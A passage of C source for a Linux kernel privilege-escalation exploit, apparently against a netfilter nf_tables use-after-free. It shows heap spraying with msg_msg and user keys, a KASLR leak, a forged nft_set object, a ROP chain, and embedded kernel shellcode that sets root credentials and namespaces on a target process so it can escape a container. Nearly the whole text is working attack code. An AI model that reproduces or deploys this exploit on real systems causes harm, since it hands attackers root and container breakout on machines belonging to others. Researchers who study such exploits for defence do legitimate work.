gadget_start[idx++] = curr_gadget->init_nsproxy_offset + kaslr_slide; gadget_start[idx++] = curr_gadget->switch_task_namespaces_offset + kaslr_slide; // End the ROP and return to user mode gadget_start[idx++] = curr_gadget->ret2user_gadget_offset + kaslr_slide; gadget_start[idx++] = 0; gadget_start[idx++] = 0; save_state(); // for prevent xmm segfault on usermode rsp &= ~0xf; rsp += 8; gadget_start[idx++] = post_exploit; gadget_start[idx++] = cs; gadget_start[idx++] = rflags; gadget_start[idx++] = rsp; gadget_start[idx++] = ss; *(uintptr_t *)(buf_ptr + 0x200) = curr_gadget->pop_rdi_ret_offset + kaslr_slide; memset(msg_buf, 0, sizeof(msg_buf)); sleep(1); ret = msgrcv(msgqids1[0], msg, 1, 0, IPC_NOWAIT | MSG_NOERROR); if (ret < 0) perror("msgrcv"); payload = (uintptr_t *)msg->mtext; // reclaim unaligned 1k msg_msg quickly! spray_msgsnd(msgqids2, 0x100, 0x400 - 48, buf, 1, 3); printf("[+] will start with gadget addr %p\n", curr_gadget->pivot_gadget_cg_1_offset + kaslr_slide); // and trigger ROP! for (int i = 0; i < 0x100; i++) { close(pipefd[i][0]); close(pipefd[i][1]); } // will never return to here mnl_socket_close(nl); sleep(1000); } int main_nocg(int argc, char **argv) { struct mnl_socket *nl; char msg_buf[0x2000]; struct msgp *msg = (struct msgp *)msg_buf; char buf[0x2000], name_buf[0x100]; int ret, key, keys[KEY_SPRAY_CNT]; // set the magic comm value // for task_struct searching phase uint64_t comm[2] = {TARGET_COMM, 0}; if (prctl(PR_SET_NAME, comm, NULL, NULL, NULL) < 0) { perror("prctl"); } // init user_keys for freelist barrier for (int i = 0; i < KEY_SPRAY_CNT; i++) { snprintf(name_buf, sizeof(name_buf), "key_%d", i); if ((keys[i] = add_key("user", name_buf, buf, 0x1f8, KEY_SPEC_PROCESS_KEYRING)) < 0) perror("add_key"); } nl = mnl_socket_open(NETLINK_NETFILTER); if (nl == NULL) { err(1, "Cannot into mnl_socket_open()"); } if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { err(1, "Cannot into mnl_socket_bind()"); } // setup table and chains printf("[*] prepare table and chain...\n"); prepare_nftables(nl); printf("[*] now trigger UAF...\n"); trigger_uaf(nl, NOCG_TARGET_SET_SIZE); // overlapping user_key_payload and nft_set memset(buf, 0, 0x200); if ((key = add_key("user", "abcdefghijklmnop", buf, 0x1f8, KEY_SPEC_PROCESS_KEYRING)) < 0) perror("add_key"); // reclaim it with new set prepare_reclaim_set(nl, RECLAIM_SET_NAME, NOCG_TARGET_SET_SIZE); // and check overlap for kernel heap leak + KASLR leak int key1; char *key_buf = malloc(0x10000); memset(key_buf, 0, sizeof(key_buf)); ret = keyctl(KEYCTL_READ, key, key_buf, 0x10000, 0); if (ret < 0) perror("keyctl"); uintptr_t *payload = key_buf; // for(int i = 0; i < 0x20; i++){ // printf("%d : 0x%llx\n", i, payload[i]); // } uintptr_t kaslr_slide = payload[0x15] - curr_gadget->nft_set_ops_offset; printf("[+] kaslr_slide : %p\n", kaslr_slide); // address of struct nft_set (overlapping with struct user_key_payload) uintptr_t nft_set_addr = payload[0] - 0x10; // binding.prev printf("[+] nft_set addr : %p\n", nft_set_addr); memset(buf, 0, sizeof(buf)); uintptr_t buf_ptr = (uintptr_t)buf - 0x18; // fake nft_set with ROP primer *(uintptr_t *)(buf_ptr + 0x18) = curr_gadget->pivot_gadget_nocg_3_offset + kaslr_slide; // [3] *(uintptr_t *)(buf_ptr + 0x30) = nft_set_addr + 0xd8; // name *(uintptr_t *)(buf_ptr + 0x39) = curr_gadget->pivot_gadget_nocg_2_offset + kaslr_slide; // [2] *(uintptr_t *)(buf_ptr + 0x60) = 0; // field_count, use *(uintptr_t *)(buf_ptr + 0xc0) = nft_set_addr + 0xd0 - 0x68; // ops => gonna call ->destroy [+0x68] *(uintptr_t *)(buf_ptr + 0xc8) = 0; // flags, genmask, klen, dlen, num_exprs *(uintptr_t *)(buf_ptr + 0xd0) = curr_gadget->pivot_gadget_nocg_1_offset + kaslr_slide; // [1] strcpy(buf_ptr + 0xd8, RECLAIM_SET_NAME); // 0xd8 ~ 0xe8 uintptr_t *gadget_start = (uintptr_t *)(buf_ptr + 0xe8); int idx = 0; gadget_start[idx++] = curr_gadget->pop_rdi_ret_offset + kaslr_slide; gadget_start[idx++] = nft_set_addr & ~0xfffUL; gadget_start[idx++] = curr_gadget->pop_rsi_ret_offset + kaslr_slide; gadget_start[idx++] = 1; gadget_start[idx++] = curr_gadget->set_memory_x_offset + kaslr_slide; gadget_start[idx++] = nft_set_addr + 0x18 + 0x20 * 8; unsigned char *sc = &gadget_start[idx]; // kernel shellcode // iterate through task_struct list started with init_task // if the target comm matches with magic value, // install init_cred / init_nsproxy / init_fs into target task_struct // and loop msleep(0xffffffff) /* 0: 4d 31 ff xor r15,r15 3: 49 be 00 00 fe ca ef movabs r14,0xdeadbeefcafe0000 ; init_task a: be ad de d: 49 bd 01 00 fe ca ef movabs r13,0xdeadbeefcafe0001 ; target_comm 14: be ad de 17: 4d 39 ae 68 07 00 00 cmp QWORD PTR [r14+0x768],r13 1e: 74 1a je 0x3a 20: 4d 8b b6 88 04 00 00 mov r14,QWORD PTR [r14+0x488] 27: 49 81 ee 88 04 00 00 sub r14,0x488 2e: 49 ff c7 inc r15 31: 49 81 ff e8 03 00 00 cmp r15,0x3e8 38: 7e d3 jle 0xd 3a: 48 bb 02 00 fe ca ef movabs rbx,0xdeadbeefcafe0002 ; init_cred 41: be ad de 44: 49 89 9e 50 07 00 00 mov QWORD PTR [r14+0x750],rbx 4b: 49 89 9e 58 07 00 00 mov QWORD PTR [r14+0x758],rbx 52: 48 bb 05 00 fe ca ef movabs rbx,0xdeadbeefcafe0005 ; init_fs 59: be ad de 5c: 49 89 9e a8 07 00 00 mov QWORD PTR [r14+0x7a8],rbx 63: 48 bb 03 00 fe ca ef movabs rbx,0xdeadbeefcafe0003 ; init_nsproxy 6a: be ad de 6d: 49 89 9e c0 07 00 00 mov QWORD PTR [r14+0x7c0],rbx 74: bf ff ff ff ff mov edi,0xffffffff 79: 48 b8 04 00 fe ca ef movabs rax,0xdeadbeefcafe0004 ; msleep 80: be ad de 83: ff d0 call rax 85: eb ed jmp 0x74 */ unsigned char data[135] = { 0x4d,0x31,0xff,0x49,0xbe,0x0,0x0,0xfe,0xca,0xef,0xbe,0xad,0xde,0x49,0xbd,0x1, 0x0,0xfe,0xca,0xef,0xbe,0xad,0xde,0x4d,0x39,0xae,0x68,0x7,0x0,0x0,0x74,0x1a, 0x4d,0x8b,0xb6,0x88,0x4,0x0,0x0,0x49,0x81,0xee,0x88,0x4,0x0,0x0,0x49,0xff, 0xc7,0x49,0x81,0xff,0xe8,0x3,0x0,0x0,0x7e,0xd3,0x48,0xbb,0x2,0x0,0xfe,0xca, 0xef,0xbe,0xad,0xde,0x49,0x89,0x9e,0x50,0x7,0x0,0x0,0x49,0x89,0x9e,0x58,0x7, 0x0,0x0,0x48,0xbb,0x5,0x0,0xfe,0xca,0xef,0xbe,0xad,0xde,0x49,0x89,0x9e,0xa8, 0x7,0x0,0x0,0x48,0xbb,0x3,0x0,0xfe,0xca,0xef,0xbe,0xad,0xde,0x49,0x89,0x9e, 0xc0,0x7,0x0,0x0,0xbf,0xff,0xff,0xff,0xff,0x48,0xb8,0x4,0x0,0xfe,0xca,0xef, 0xbe,0xad,0xde,0xff,0xd0,0xeb,0xed, }; replace(data, sizeof(data), 0xdeadbeefcafe0000, curr_gadget->init_task_offset + kaslr_slide); replace(data, sizeof(data), 0xdeadbeefcafe0001, TARGET_COMM); replace(data, sizeof(data), 0xdeadbeefcafe0002, curr_gadget->init_cred_offset + kaslr_slide); replace(data, sizeof(data), 0xdeadbeefcafe0003, curr_gadget->init_nsproxy_offset + kaslr_slide); replace(data, sizeof(data), 0xdeadbeefcafe0004, curr_gadget->msleep_offset + kaslr_slide); replace(data, sizeof(data), 0xdeadbeefcafe0005, curr_gadget->init_fs_offset + kaslr_slide); memcpy(sc, data, sizeof(data)); // free the chunk and reclaim with our fake nft_set if (keyctl(KEYCTL_REVOKE, key, 0, 0, 0) < 0) { perror("keyctl(KEYCTL_REVOKE)"); } sleep(1); // key is released by rcu, let's wait for a while... if ((key = add_key("user", "yeeeeeeeeeet", buf, 0x1f8, KEY_SPEC_PROCESS_KEYRING)) < 0) perror("add_key"); // reclaim to overwrite should be done // now populate the kmalloc-1k cache to avoid // touching corrupted freelist for (int i = 0; i < KEY_SPRAY_CNT; i++) { if (keyctl(KEYCTL_REVOKE, keys[i], 0, 0, 0) < 0) perror("keyctl"); } sleep(1); // key is released by rcu, let's wait for a while... // delete nft_set to trigger ROP chian! // notice that this ROP chain is run on worker context release_reclaim_set(nl, RECLAIM_SET_NAME); mnl_socket_close(nl); printf("[*] now take a rest while worker make us escape!\n"); sleep(3); post_exploit(); } int main(int argc, char *argv[]) { // exploit initialization setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); setvbuf(stderr, 0, 2, 0); unshare_setup(getuid(), getgid()); set_cpu_affinity(0, 0); if (!init_gadget()) { printf("[-] exploit not supported\n"); return -1; } if (curr_gadget->is_netfilter_cg) { main_cg(argc, argv); } else { main_nocg(argc, argv); } }